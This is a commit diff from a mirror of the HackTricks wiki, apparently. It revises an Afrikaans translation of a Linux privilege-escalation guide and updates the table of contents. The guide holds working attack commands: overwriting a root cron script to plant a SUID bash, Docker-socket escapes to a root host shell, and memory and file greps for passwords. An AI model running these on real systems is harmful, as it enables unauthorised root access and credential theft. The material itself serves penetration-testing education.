mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/linux-hardening/privilege-escalation/README.md'] to af
This commit is contained in:
parent
53173d44b2
commit
c28d8c2172
@ -793,6 +793,29 @@
|
|||||||
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
|
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
|
||||||
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
|
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
|
||||||
|
|
||||||
|
# 🤖 AI
|
||||||
|
- [AI Security](AI/README.md)
|
||||||
|
- [AI Security Methodology](AI/AI-Deep-Learning.md)
|
||||||
|
- [AI MCP Security](AI/AI-MCP-Servers.md)
|
||||||
|
- [AI Model Data Preparation](AI/AI-Model-Data-Preparation-and-Evaluation.md)
|
||||||
|
- [AI Models RCE](AI/AI-Models-RCE.md)
|
||||||
|
- [AI Prompts](AI/AI-Prompts.md)
|
||||||
|
- [AI Risk Frameworks](AI/AI-Risk-Frameworks.md)
|
||||||
|
- [AI Supervised Learning Algorithms](AI/AI-Supervised-Learning-Algorithms.md)
|
||||||
|
- [AI Unsupervised Learning Algorithms](AI/AI-Unsupervised-Learning-algorithms.md)
|
||||||
|
- [AI Reinforcement Learning Algorithms](AI/AI-Reinforcement-Learning-Algorithms.md)
|
||||||
|
- [LLM Training](AI/AI-llm-architecture/README.md)
|
||||||
|
- [0. Basic LLM Concepts](AI/AI-llm-architecture/0.-basic-llm-concepts.md)
|
||||||
|
- [1. Tokenizing](AI/AI-llm-architecture/1.-tokenizing.md)
|
||||||
|
- [2. Data Sampling](AI/AI-llm-architecture/2.-data-sampling.md)
|
||||||
|
- [3. Token Embeddings](AI/AI-llm-architecture/3.-token-embeddings.md)
|
||||||
|
- [4. Attention Mechanisms](AI/AI-llm-architecture/4.-attention-mechanisms.md)
|
||||||
|
- [5. LLM Architecture](AI/AI-llm-architecture/5.-llm-architecture.md)
|
||||||
|
- [6. Pre-training & Loading models](AI/AI-llm-architecture/6.-pre-training-and-loading-models.md)
|
||||||
|
- [7.0. LoRA Improvements in fine-tuning](AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md)
|
||||||
|
- [7.1. Fine-Tuning for Classification](AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md)
|
||||||
|
- [7.2. Fine-Tuning to follow instructions](AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md)
|
||||||
|
|
||||||
# 🔩 Reversing
|
# 🔩 Reversing
|
||||||
|
|
||||||
- [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
|
- [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
|
||||||
@ -850,17 +873,6 @@
|
|||||||
- [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md)
|
- [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md)
|
||||||
- [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
|
- [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
|
||||||
- [Test LLMs](todo/test-llms.md)
|
- [Test LLMs](todo/test-llms.md)
|
||||||
- [LLM Training](todo/llm-training-data-preparation/README.md)
|
|
||||||
- [0. Basic LLM Concepts](todo/llm-training-data-preparation/0.-basic-llm-concepts.md)
|
|
||||||
- [1. Tokenizing](todo/llm-training-data-preparation/1.-tokenizing.md)
|
|
||||||
- [2. Data Sampling](todo/llm-training-data-preparation/2.-data-sampling.md)
|
|
||||||
- [3. Token Embeddings](todo/llm-training-data-preparation/3.-token-embeddings.md)
|
|
||||||
- [4. Attention Mechanisms](todo/llm-training-data-preparation/4.-attention-mechanisms.md)
|
|
||||||
- [5. LLM Architecture](todo/llm-training-data-preparation/5.-llm-architecture.md)
|
|
||||||
- [6. Pre-training & Loading models](todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md)
|
|
||||||
- [7.0. LoRA Improvements in fine-tuning](todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md)
|
|
||||||
- [7.1. Fine-Tuning for Classification](todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md)
|
|
||||||
- [7.2. Fine-Tuning to follow instructions](todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md)
|
|
||||||
- [Burp Suite](todo/burp-suite.md)
|
- [Burp Suite](todo/burp-suite.md)
|
||||||
- [Other Web Tricks](todo/other-web-tricks.md)
|
- [Other Web Tricks](todo/other-web-tricks.md)
|
||||||
- [Interesting HTTP$$external:todo/interesting-http.md$$]()
|
- [Interesting HTTP$$external:todo/interesting-http.md$$]()
|
||||||
|
@ -14,7 +14,7 @@ cat /etc/os-release 2>/dev/null # universal on modern systems
|
|||||||
```
|
```
|
||||||
### Pad
|
### Pad
|
||||||
|
|
||||||
As jy **skryfreëls op enige vouer binne die `PATH`** veranderlike het, mag jy in staat wees om sommige biblioteke of binêre te kap:
|
As jy **skrywe toestemmings op enige vouer binne die `PATH`** veranderlike het, mag jy in staat wees om sommige biblioteke of binêre te kap:
|
||||||
```bash
|
```bash
|
||||||
echo $PATH
|
echo $PATH
|
||||||
```
|
```
|
||||||
@ -26,26 +26,26 @@ Interessante inligting, wagwoorde of API sleutels in die omgewingsveranderlikes?
|
|||||||
```
|
```
|
||||||
### Kernel exploits
|
### Kernel exploits
|
||||||
|
|
||||||
Kontroleer die kern weergawe en of daar 'n eksploits is wat gebruik kan word om voorregte te verhoog
|
Kontroleer die kern weergawe en of daar 'n eksploitsie is wat gebruik kan word om voorregte te verhoog
|
||||||
```bash
|
```bash
|
||||||
cat /proc/version
|
cat /proc/version
|
||||||
uname -a
|
uname -a
|
||||||
searchsploit "Linux Kernel"
|
searchsploit "Linux Kernel"
|
||||||
```
|
```
|
||||||
Jy kan 'n goeie lys van kwesbare kernel en sommige reeds **gecompileerde exploits** hier vind: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) en [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\
|
Jy kan 'n goeie lys van kwesbare kernels en sommige reeds **gecompileerde exploits** hier vind: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) en [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\
|
||||||
Ander webwerwe waar jy 'n paar **gecompileerde exploits** kan vind: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
|
Ander webwerwe waar jy 'n paar **gecompileerde exploits** kan vind: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
|
||||||
|
|
||||||
Om al die kwesbare kernel weergawes van daardie web te onttrek, kan jy doen:
|
Om al die kwesbare kern weergawe van daardie web te onttrek, kan jy doen:
|
||||||
```bash
|
```bash
|
||||||
curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '
|
curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '
|
||||||
```
|
```
|
||||||
Tools wat kan help om vir kernel exploits te soek is:
|
Hulpmiddels wat kan help om kernelaanvalle te soek, is:
|
||||||
|
|
||||||
[linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\
|
[linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\
|
||||||
[linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\
|
[linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\
|
||||||
[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (voer uit IN slagoffer, kyk net na exploits vir kernel 2.x)
|
[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (voer uit IN slagoffer, kyk net na aanvalle vir kernels 2.x)
|
||||||
|
|
||||||
Soek altyd **die kernel weergawe in Google**, dalk is jou kernel weergawe in 'n of ander kernel exploit geskryf en dan sal jy seker wees dat hierdie exploit geldig is.
|
Soek altyd **die kernelaanweergawe in Google**, miskien is jou kernelaanweergawe in 'n of ander kernelaanval geskryf en dan sal jy seker wees dat hierdie aanval geldig is.
|
||||||
|
|
||||||
### CVE-2016-5195 (DirtyCow)
|
### CVE-2016-5195 (DirtyCow)
|
||||||
|
|
||||||
@ -75,7 +75,7 @@ sudo -u#-1 /bin/bash
|
|||||||
```
|
```
|
||||||
### Dmesg-handtekeningverifikasie het gefaal
|
### Dmesg-handtekeningverifikasie het gefaal
|
||||||
|
|
||||||
Kyk na **smasher2 box of HTB** vir 'n **voorbeeld** van hoe hierdie kwesbaarheid benut kan word
|
Kyk na **smasher2 box of HTB** vir 'n **voorbeeld** van hoe hierdie kwesbaarheid uitgebuit kan word
|
||||||
```bash
|
```bash
|
||||||
dmesg 2>/dev/null | grep "signature"
|
dmesg 2>/dev/null | grep "signature"
|
||||||
```
|
```
|
||||||
@ -140,25 +140,25 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc
|
|||||||
```
|
```
|
||||||
## Nuttige sagteware
|
## Nuttige sagteware
|
||||||
|
|
||||||
Tel nuttige binaire op
|
Lys nuttige binaire.
|
||||||
```bash
|
```bash
|
||||||
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
|
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
|
||||||
```
|
```
|
||||||
Kontroleer ook of **enige kompilator geïnstalleer is**. Dit is nuttig as jy 'n kernuitbuiting moet gebruik, aangesien dit aanbeveel word om dit op die masjien waar jy dit gaan gebruik (of op een soortgelyke) te kompileer.
|
Kontroleer ook of **enige kompilator geïnstalleer is**. Dit is nuttig as jy 'n kernel-ontploffing moet gebruik, aangesien dit aanbeveel word om dit op die masjien te compileer waar jy dit gaan gebruik (of op een soortgelyke).
|
||||||
```bash
|
```bash
|
||||||
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
|
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
|
||||||
```
|
```
|
||||||
### Kwetsbare Sagteware Geïnstalleer
|
### Kwetsbare Sagteware Geïnstalleer
|
||||||
|
|
||||||
Kyk vir die **weergawe van die geïnstalleerde pakkette en dienste**. Miskien is daar 'n ou Nagios-weergawe (byvoorbeeld) wat benut kan word om voorregte te verhoog…\
|
Kontroleer die **weergawe van die geïnstalleerde pakkette en dienste**. Miskien is daar 'n ou Nagios weergawe (byvoorbeeld) wat benut kan word om voorregte te verhoog…\
|
||||||
Dit word aanbeveel om handmatig die weergawe van die meer verdagte geïnstalleerde sagteware na te gaan.
|
Dit word aanbeveel om handmatig die weergawe van die meer verdagte geïnstalleerde sagteware te kontroleer.
|
||||||
```bash
|
```bash
|
||||||
dpkg -l #Debian
|
dpkg -l #Debian
|
||||||
rpm -qa #Centos
|
rpm -qa #Centos
|
||||||
```
|
```
|
||||||
As jy SSH-toegang tot die masjien het, kan jy ook **openVAS** gebruik om te kyk vir verouderde en kwesbare sagteware wat op die masjien geïnstalleer is.
|
As jy SSH-toegang tot die masjien het, kan jy ook **openVAS** gebruik om te kyk vir verouderde en kwesbare sagteware wat op die masjien geïnstalleer is.
|
||||||
|
|
||||||
> [!NOTE] > _Let daarop dat hierdie opdragte 'n baie inligting sal toon wat meestal nutteloos sal wees, daarom word dit aanbeveel om sommige toepassings soos OpenVAS of soortgelyk te gebruik wat sal kyk of enige geïnstalleerde sagteware weergawe kwesbaar is vir bekende eksploitte_
|
> [!NOTE] > _Let daarop dat hierdie opdragte 'n baie inligting sal toon wat meestal nutteloos sal wees, daarom word dit aanbeveel om sommige toepassings soos OpenVAS of soortgelyk te gebruik wat sal kyk of enige geïnstalleerde sagteware weergawe kwesbaar is vir bekende ontploffings_
|
||||||
|
|
||||||
## Prosesse
|
## Prosesse
|
||||||
|
|
||||||
@ -230,7 +230,7 @@ rm $1*.bin
|
|||||||
```
|
```
|
||||||
#### /dev/mem
|
#### /dev/mem
|
||||||
|
|
||||||
`/dev/mem` bied toegang tot die stelsel se **fisiese** geheue, nie die virtuele geheue nie. Die kern se virtuele adresruimte kan toegang verkry word met /dev/kmem.\
|
`/dev/mem` bied toegang tot die stelsel se **fisiese** geheue, nie die virtuele geheue nie. Die kern se virtuele adresruimte kan verkry word met /dev/kmem.\
|
||||||
Tipies is `/dev/mem` slegs leesbaar deur **root** en die **kmem** groep.
|
Tipies is `/dev/mem` slegs leesbaar deur **root** en die **kmem** groep.
|
||||||
```
|
```
|
||||||
strings /dev/mem -n10 | grep -i PASS
|
strings /dev/mem -n10 | grep -i PASS
|
||||||
@ -269,7 +269,7 @@ Press Ctrl-C to end monitoring without terminating the process.
|
|||||||
Om 'n prosesgeheue te dump, kan jy gebruik maak van:
|
Om 'n prosesgeheue te dump, kan jy gebruik maak van:
|
||||||
|
|
||||||
- [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux)
|
- [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux)
|
||||||
- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Jy kan handmatig die root vereistes verwyder en die proses wat aan jou behoort dump
|
- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Jy kan handmatig root vereistes verwyder en die proses wat aan jou behoort dump
|
||||||
- Skrip A.5 van [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root is vereis)
|
- Skrip A.5 van [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root is vereis)
|
||||||
|
|
||||||
### Credentials from Process Memory
|
### Credentials from Process Memory
|
||||||
@ -288,15 +288,15 @@ strings *.dump | grep -i password
|
|||||||
```
|
```
|
||||||
#### mimipenguin
|
#### mimipenguin
|
||||||
|
|
||||||
Die hulpmiddel [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) sal **duidelike teks geloofsbriewe uit geheue** en van 'n paar **goed bekende lêers** steel. Dit vereis wortelregte om behoorlik te werk.
|
Die hulpmiddel [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) sal **duidelike teks geloofsbriewe uit geheue** en uit 'n paar **bekende lêers** steel. Dit vereis wortelregte om behoorlik te werk.
|
||||||
|
|
||||||
| Kenmerk | Prosesnaam |
|
| Kenmerk | Prosesnaam |
|
||||||
| ------------------------------------------------- | -------------------- |
|
| ------------------------------------------------- | -------------------- |
|
||||||
| GDM wagwoord (Kali Desktop, Debian Desktop) | gdm-password |
|
| GDM wagwoord (Kali Desktop, Debian Desktop) | gdm-password |
|
||||||
| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon |
|
| Gnome Sleutelhanger (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon |
|
||||||
| LightDM (Ubuntu Desktop) | lightdm |
|
| LightDM (Ubuntu Desktop) | lightdm |
|
||||||
| VSFTPd (Aktiewe FTP Verbindinge) | vsftpd |
|
| VSFTPd (Aktiewe FTP Verbindinge) | vsftpd |
|
||||||
| Apache2 (Aktiewe HTTP Basiese Auth Sessies) | apache2 |
|
| Apache2 (Aktiewe HTTP Basiese Auth Sessions) | apache2 |
|
||||||
| OpenSSH (Aktiewe SSH Sessies - Sudo Gebruik) | sshd: |
|
| OpenSSH (Aktiewe SSH Sessies - Sudo Gebruik) | sshd: |
|
||||||
|
|
||||||
#### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc)
|
#### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc)
|
||||||
@ -327,7 +327,7 @@ Byvoorbeeld, binne _/etc/crontab_ kan jy die PAD vind: _PATH=**/home/user**:/usr
|
|||||||
|
|
||||||
(_Let op hoe die gebruiker "user" skryfregte oor /home/user het_)
|
(_Let op hoe die gebruiker "user" skryfregte oor /home/user het_)
|
||||||
|
|
||||||
As die root gebruiker in hierdie crontab probeer om 'n opdrag of skrip uit te voer sonder om die pad in te stel. Byvoorbeeld: _\* \* \* \* root overwrite.sh_\
|
As die root-gebruiker binne hierdie crontab probeer om 'n opdrag of skrip uit te voer sonder om die pad in te stel. Byvoorbeeld: _\* \* \* \* root overwrite.sh_\
|
||||||
Dan kan jy 'n root shell kry deur te gebruik:
|
Dan kan jy 'n root shell kry deur te gebruik:
|
||||||
```bash
|
```bash
|
||||||
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
|
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
|
||||||
@ -356,15 +356,15 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
|
|||||||
#Wait until it is executed
|
#Wait until it is executed
|
||||||
/tmp/bash -p
|
/tmp/bash -p
|
||||||
```
|
```
|
||||||
As die skrip wat deur root uitgevoer word 'n **gids gebruik waar jy volle toegang het**, mag dit nuttig wees om daardie gids te verwyder en **'n simboliese skakelgids na 'n ander een te skep** wat 'n skrip wat deur jou beheer word, dien
|
As die skrip wat deur root uitgevoer word 'n **gids gebruik waar jy volle toegang het**, kan dit dalk nuttig wees om daardie gids te verwyder en **'n simboliese skakelgids na 'n ander een te skep** wat 'n skrip wat deur jou beheer word, dien
|
||||||
```bash
|
```bash
|
||||||
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
|
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
|
||||||
```
|
```
|
||||||
### Gereelde cron take
|
### Gereelde cron take
|
||||||
|
|
||||||
Jy kan die prosesse monitor om te soek na prosesse wat elke 1, 2 of 5 minute uitgevoer word. Miskien kan jy dit benut en privilige verhoog.
|
Jy kan die prosesse monitor om te soek na prosesse wat elke 1, 2 of 5 minute uitgevoer word. Miskien kan jy daarvan voordeel trek en privilige verhoog.
|
||||||
|
|
||||||
Byvoorbeeld, om **elke 0.1s vir 1 minuut te monitor**, **te sorteer volgens minder uitgevoerde opdragte** en die opdragte wat die meeste uitgevoer is te verwyder, kan jy doen:
|
Byvoorbeeld, om **elke 0.1s gedurende 1 minuut te monitor**, **te sorteer volgens minder uitgevoerde opdragte** en die opdragte wat die meeste uitgevoer is te verwyder, kan jy doen:
|
||||||
```bash
|
```bash
|
||||||
for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
|
for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
|
||||||
```
|
```
|
||||||
@ -419,18 +419,18 @@ Unit=backdoor.service
|
|||||||
```
|
```
|
||||||
In die dokumentasie kan jy lees wat die Eenheid is:
|
In die dokumentasie kan jy lees wat die Eenheid is:
|
||||||
|
|
||||||
> Die eenheid om te aktiveer wanneer hierdie timer verstryk. Die argument is 'n eenheidsnaam, waarvan die agtervoegsel nie ".timer" is nie. As dit nie gespesifiseer is nie, is hierdie waarde die standaard vir 'n diens wat dieselfde naam as die timer eenheid het, behalwe vir die agtervoegsel. (Sien hierbo.) Dit word aanbeveel dat die eenheidsnaam wat geaktiveer word en die eenheidsnaam van die timer eenheid identies genoem word, behalwe vir die agtervoegsel.
|
> Die eenheid om te aktiveer wanneer hierdie timer verstryk. Die argument is 'n eenheid naam, waarvan die agtervoegsel nie ".timer" is nie. As dit nie gespesifiseer is nie, is hierdie waarde die standaard vir 'n diens wat dieselfde naam as die timer eenheid het, behalwe vir die agtervoegsel. (Sien hierbo.) Dit word aanbeveel dat die eenheid naam wat geaktiveer word en die eenheid naam van die timer eenheid identies genoem word, behalwe vir die agtervoegsel.
|
||||||
|
|
||||||
Daarom, om hierdie toestemming te misbruik, moet jy:
|
Daarom, om hierdie toestemming te misbruik, moet jy:
|
||||||
|
|
||||||
- 'n sekere systemd eenheid (soos 'n `.service`) vind wat **'n skryfbare binêre uitvoer**
|
- 'n sekere systemd eenheid vind (soos 'n `.service`) wat **'n skryfbare binêre uitvoer**
|
||||||
- 'n sekere systemd eenheid vind wat **'n relatiewe pad uitvoer** en jy het **skryfbevoegdhede** oor die **systemd PAD** (om daardie uitvoerbare te verpersoonlik)
|
- 'n sekere systemd eenheid vind wat **'n relatiewe pad uitvoer** en jy het **skryfregte** oor die **systemd PAD** (om daardie uitvoerbare te verteenwoordig)
|
||||||
|
|
||||||
**Leer meer oor timers met `man systemd.timer`.**
|
**Leer meer oor timers met `man systemd.timer`.**
|
||||||
|
|
||||||
### **Timer Aktivering**
|
### **Timer Aktivering**
|
||||||
|
|
||||||
Om 'n timer te aktiveer, het jy wortelbevoegdhede nodig en moet jy uitvoer:
|
Om 'n timer te aktiveer, het jy worteltoestemmings nodig en moet jy uitvoer:
|
||||||
```bash
|
```bash
|
||||||
sudo systemctl enable backu2.timer
|
sudo systemctl enable backu2.timer
|
||||||
Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.
|
Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.
|
||||||
@ -445,7 +445,7 @@ Sockets kan gekonfigureer word met behulp van `.socket` lêers.
|
|||||||
|
|
||||||
**Leer meer oor sockets met `man systemd.socket`.** Binne hierdie lêer kan verskeie interessante parameters gekonfigureer word:
|
**Leer meer oor sockets met `man systemd.socket`.** Binne hierdie lêer kan verskeie interessante parameters gekonfigureer word:
|
||||||
|
|
||||||
- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Hierdie opsies is verskillend, maar 'n opsomming word gebruik om **aan te dui waar dit gaan luister** na die socket (die pad van die AF_UNIX socket lêer, die IPv4/6 en/of poortnommer om na te luister, ens.)
|
- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Hierdie opsies is verskillend, maar 'n opsomming word gebruik om **aan te dui waar dit gaan luister** na die socket (die pad van die AF_UNIX socket lêer, die IPv4/6 en/of poortnommer om te luister, ens.)
|
||||||
- `Accept`: Neem 'n boolean argument. As **waar**, 'n **diensinstansie word geskep vir elke inkomende verbinding** en slegs die verbinding socket word aan dit oorgedra. As **vals**, word al die luister sockets self **aan die begin diens eenheid oorgedra**, en slegs een diens eenheid word geskep vir al die verbindings. Hierdie waarde word geïgnoreer vir datagram sockets en FIFOs waar 'n enkele diens eenheid onvoorwaardelik al die inkomende verkeer hanteer. **Standaard is vals**. Vir prestasiedoeleindes word dit aanbeveel om nuwe daemons slegs op 'n manier te skryf wat geskik is vir `Accept=no`.
|
- `Accept`: Neem 'n boolean argument. As **waar**, 'n **diensinstansie word geskep vir elke inkomende verbinding** en slegs die verbinding socket word aan dit oorgedra. As **vals**, word al die luister sockets self **aan die begin diens eenheid oorgedra**, en slegs een diens eenheid word geskep vir al die verbindings. Hierdie waarde word geïgnoreer vir datagram sockets en FIFOs waar 'n enkele diens eenheid onvoorwaardelik al die inkomende verkeer hanteer. **Standaard is vals**. Vir prestasiedoeleindes word dit aanbeveel om nuwe daemons slegs op 'n manier te skryf wat geskik is vir `Accept=no`.
|
||||||
- `ExecStartPre`, `ExecStartPost`: Neem een of meer opdraglyne, wat **uitgevoer word voor** of **na** die luister **sockets**/FIFOs **gecreëer** en gebind word, onderskeidelik. Die eerste token van die opdraglyn moet 'n absolute lêernaam wees, gevolg deur argumente vir die proses.
|
- `ExecStartPre`, `ExecStartPost`: Neem een of meer opdraglyne, wat **uitgevoer word voor** of **na** die luister **sockets**/FIFOs **gecreëer** en gebind word, onderskeidelik. Die eerste token van die opdraglyn moet 'n absolute lêernaam wees, gevolg deur argumente vir die proses.
|
||||||
- `ExecStopPre`, `ExecStopPost`: Bykomende **opdragte** wat **uitgevoer word voor** of **na** die luister **sockets**/FIFOs **gesluit** en verwyder word, onderskeidelik.
|
- `ExecStopPre`, `ExecStopPost`: Bykomende **opdragte** wat **uitgevoer word voor** of **na** die luister **sockets**/FIFOs **gesluit** en verwyder word, onderskeidelik.
|
||||||
@ -458,7 +458,7 @@ _Nota dat die stelsel daardie socket lêer konfigurasie moet gebruik of die back
|
|||||||
|
|
||||||
### Skryfbare sockets
|
### Skryfbare sockets
|
||||||
|
|
||||||
As jy **enige skryfbare socket identifiseer** (_nou praat ons oor Unix Sockets en nie oor die konfig .socket lêers nie_), dan **kan jy kommunikeer** met daardie socket en dalk 'n kwesbaarheid benut.
|
As jy **enige skryfbare socket identifiseer** (_nou praat ons oor Unix Sockets en nie oor die konfig .socket lêers nie_), dan **kan jy kommunikeer** met daardie socket en dalk 'n kwesbaarheid ontgin.
|
||||||
|
|
||||||
### Enumereer Unix Sockets
|
### Enumereer Unix Sockets
|
||||||
```bash
|
```bash
|
||||||
@ -485,24 +485,24 @@ Let daarop dat daar dalk **sokke is wat luister na HTTP** versoeke (_Ek praat ni
|
|||||||
```bash
|
```bash
|
||||||
curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
|
curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
|
||||||
```
|
```
|
||||||
As die socket **reageer met 'n HTTP** versoek, kan jy **kommunikeer** daarmee en dalk **'n kwesbaarheid ontgin**.
|
As die socket **reageer met 'n HTTP** versoek, kan jy **kommunikeer** daarmee en dalk **'n sekuriteitskwessie** ontgin.
|
||||||
|
|
||||||
### Skryfbare Docker Socket
|
### Skryfbare Docker Socket
|
||||||
|
|
||||||
Die Docker socket, wat dikwels by `/var/run/docker.sock` gevind word, is 'n kritieke lêer wat beveilig moet word. Standaard is dit skryfbaar deur die `root` gebruiker en lede van die `docker` groep. Om skryfreëling tot hierdie socket te hê, kan lei tot privilige-escalasie. Hier is 'n uiteensetting van hoe dit gedoen kan word en alternatiewe metodes as die Docker CLI nie beskikbaar is nie.
|
Die Docker socket, wat dikwels by `/var/run/docker.sock` gevind word, is 'n kritieke lêer wat beveilig moet word. Standaard is dit skryfbaar deur die `root` gebruiker en lede van die `docker` groep. Om skryfreëling tot hierdie socket te hê, kan lei tot privilige-eskalasie. Hier is 'n uiteensetting van hoe dit gedoen kan word en alternatiewe metodes as die Docker CLI nie beskikbaar is nie.
|
||||||
|
|
||||||
#### **Privilige-Escalasie met Docker CLI**
|
#### **Privilige Eskalasie met Docker CLI**
|
||||||
|
|
||||||
As jy skryfreëling tot die Docker socket het, kan jy privilige verhoog met die volgende opdragte:
|
As jy skryfreëling tot die Docker socket het, kan jy privilige eskalasie doen met die volgende opdragte:
|
||||||
```bash
|
```bash
|
||||||
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
|
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
|
||||||
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
|
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
|
||||||
```
|
```
|
||||||
Hierdie opdragte laat jou toe om 'n houer met wortelvlaktoegang tot die gasheer se lêerstelsel te loop.
|
Hierdie opdragte laat jou toe om 'n houer met wortelvlaktoegang tot die gasheer se lêerstelsel te draai.
|
||||||
|
|
||||||
#### **Gebruik Docker API Direk**
|
#### **Gebruik Docker API Direk**
|
||||||
|
|
||||||
In gevalle waar die Docker CLI nie beskikbaar is nie, kan die Docker-soket steeds gemanipuleer word met behulp van die Docker API en `curl` opdragte.
|
